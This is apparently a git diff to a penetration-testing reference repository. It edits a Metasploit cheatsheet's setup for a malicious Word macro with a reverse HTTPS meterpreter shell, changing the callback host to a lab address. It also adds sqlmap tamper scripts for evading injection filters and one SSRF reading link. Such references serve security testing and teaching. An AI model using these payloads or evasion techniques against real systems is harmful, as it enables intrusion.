diff --git a/Methodology and Resources/Metasploit - Cheatsheet.md b/Methodology and Resources/Metasploit - Cheatsheet.md index 53132677..6438f7a0 100644 --- a/Methodology and Resources/Metasploit - Cheatsheet.md +++ b/Methodology and Resources/Metasploit - Cheatsheet.md @@ -135,7 +135,7 @@ exploit -j -z use exploit/multi/fileformat/office_word_macro set PAYLOAD windows/meterpreter/reverse_https -set LHOST 159.65.52.124 +set LHOST 10.10.14.22 set LPORT 4646 exploit ``` diff --git a/SQL injection/README.md b/SQL injection/README.md index 136d7c2d..89567870 100644 --- a/SQL injection/README.md +++ b/SQL injection/README.md @@ -183,6 +183,7 @@ tamper=name_of_the_tamper | Tamper | Description | | --- | --- | +|0x2char.py | Replaces each (MySQL) 0x encoded string with equivalent CONCAT(CHAR(),…) counterpart | |apostrophemask.py | Replaces apostrophe character with its UTF-8 full width counterpart | |apostrophenullencode.py | Replaces apostrophe character with its illegal double unicode counterpart| |appendnullbyte.py | Appends encoded NULL byte character at the end of payload | @@ -190,8 +191,12 @@ tamper=name_of_the_tamper |between.py | Replaces greater than operator ('>') with 'NOT BETWEEN 0 AND #' | |bluecoat.py | Replaces space character after SQL statement with a valid random blank character.Afterwards replace character = with LIKE operator | |chardoubleencode.py | Double url-encodes all characters in a given payload (not processing already encoded) | +|charencode.py | URL-encodes all characters in a given payload (not processing already encoded) (e.g. SELECT -> %53%45%4C%45%43%54) | +|charunicodeencode.py | Unicode-URL-encodes all characters in a given payload (not processing already encoded) (e.g. SELECT -> %u0053%u0045%u004C%u0045%u0043%u0054) | +|charunicodeescape.py | Unicode-escapes non-encoded characters in a given payload (not processing already encoded) (e.g. SELECT -> \u0053\u0045\u004C\u0045\u0043\u0054) | |commalesslimit.py | Replaces instances like 'LIMIT M, N' with 'LIMIT N OFFSET M'| |commalessmid.py | Replaces instances like 'MID(A, B, C)' with 'MID(A FROM B FOR C)'| +|commentbeforeparentheses.py | Prepends (inline) comment before parentheses (e.g. ( -> /**/() | |concat2concatws.py | Replaces instances like 'CONCAT(A, B)' with 'CONCAT_WS(MID(CHAR(0), 0, 0), A, B)'| |charencode.py | Url-encodes all characters in a given payload (not processing already encoded) | |charunicodeencode.py | Unicode-url-encodes non-encoded characters in a given payload (not processing already encoded) | @@ -199,16 +204,24 @@ tamper=name_of_the_tamper |escapequotes.py | Slash escape quotes (' and ") | |greatest.py | Replaces greater than operator ('>') with 'GREATEST' counterpart | |halfversionedmorekeywords.py | Adds versioned MySQL comment before each keyword | +|htmlencode.py | HTML encode (using code points) all non-alphanumeric characters (e.g. ‘ -> ') | +|ifnull2casewhenisnull.py | Replaces instances like ‘IFNULL(A, B)’ with ‘CASE WHEN ISNULL(A) THEN (B) ELSE (A) END’ counterpart| |ifnull2ifisnull.py | Replaces instances like 'IFNULL(A, B)' with 'IF(ISNULL(A), B, A)'| +|informationschemacomment.py | Add an inline comment (/**/) to the end of all occurrences of (MySQL) “information_schema” identifier | +|least.py | Replaces greater than operator (‘>’) with ‘LEAST’ counterpart | +|lowercase.py | Replaces each keyword character with lower case value (e.g. SELECT -> select) | |modsecurityversioned.py | Embraces complete query with versioned comment | |modsecurityzeroversioned.py | Embraces complete query with zero-versioned comment | |multiplespaces.py | Adds multiple spaces around SQL keywords | |nonrecursivereplacement.py | Replaces predefined SQL keywords with representations suitable for replacement (e.g. .replace("SELECT", "")) filters| -|percentage.py | Adds a percentage sign ('%') infront of each character | |overlongutf8.py | Converts all characters in a given payload (not processing already encoded) | +|overlongutf8more.py | Converts all characters in a given payload to overlong UTF8 (not processing already encoded) (e.g. SELECT -> %C1%93%C1%85%C1%8C%C1%85%C1%83%C1%94) | +|percentage.py | Adds a percentage sign ('%') infront of each character | +|plus2concat.py | Replaces plus operator (‘+’) with (MsSQL) function CONCAT() counterpart | +|plus2fnconcat.py | Replaces plus operator (‘+’) with (MsSQL) ODBC function {fn CONCAT()} counterpart | |randomcase.py | Replaces each keyword character with random case value | |randomcomments.py | Add random comments to SQL keywords| -|securesphere.py | Appends special crafted string| +|securesphere.py | Appends special crafted string | |sp_password.py | Appends 'sp_password' to the end of the payload for automatic obfuscation from DBMS logs | |space2comment.py | Replaces space character (' ') with comments | |space2dash.py | Replaces space character (' ') with a dash comment ('--') followed by a random string and a new line ('\n') | diff --git a/Server Side Request Forgery/README.md b/Server Side Request Forgery/README.md index e2699f11..d79c0618 100644 --- a/Server Side Request Forgery/README.md +++ b/Server Side Request Forgery/README.md @@ -509,4 +509,5 @@ More info: https://rancher.com/docs/rancher/v1.6/en/rancher-services/metadata-se - [Piercing the Veil: Server Side Request Forgery to NIPRNet access](https://medium.com/bugbountywriteup/piercing-the-veil-server-side-request-forgery-to-niprnet-access-c358fd5e249a) - [Hacker101 SSRF](https://www.youtube.com/watch?v=66ni2BTIjS8) - [SSRF脆弱性を利用したGCE/GKEインスタンスへの攻撃例](https://blog.ssrf.in/post/example-of-attack-on-gce-and-gke-instance-using-ssrf-vulnerability/) -- [SSRF - Server Side Request Forgery (Types and ways to exploit it) Part-1 - SaN ThosH - 10 Jan 2019](https://medium.com/@madrobot/ssrf-server-side-request-forgery-types-and-ways-to-exploit-it-part-1-29d034c27978) \ No newline at end of file +- [SSRF - Server Side Request Forgery (Types and ways to exploit it) Part-1 - SaN ThosH - 10 Jan 2019](https://medium.com/@madrobot/ssrf-server-side-request-forgery-types-and-ways-to-exploit-it-part-1-29d034c27978) +- [SSRF Protocol Smuggling in Plaintext Credential Handlers : LDAP - @0xrst](https://www.silentrobots.com/blog/2019/02/06/ssrf-protocol-smuggling-in-plaintext-credential-handlers-ldap/) \ No newline at end of file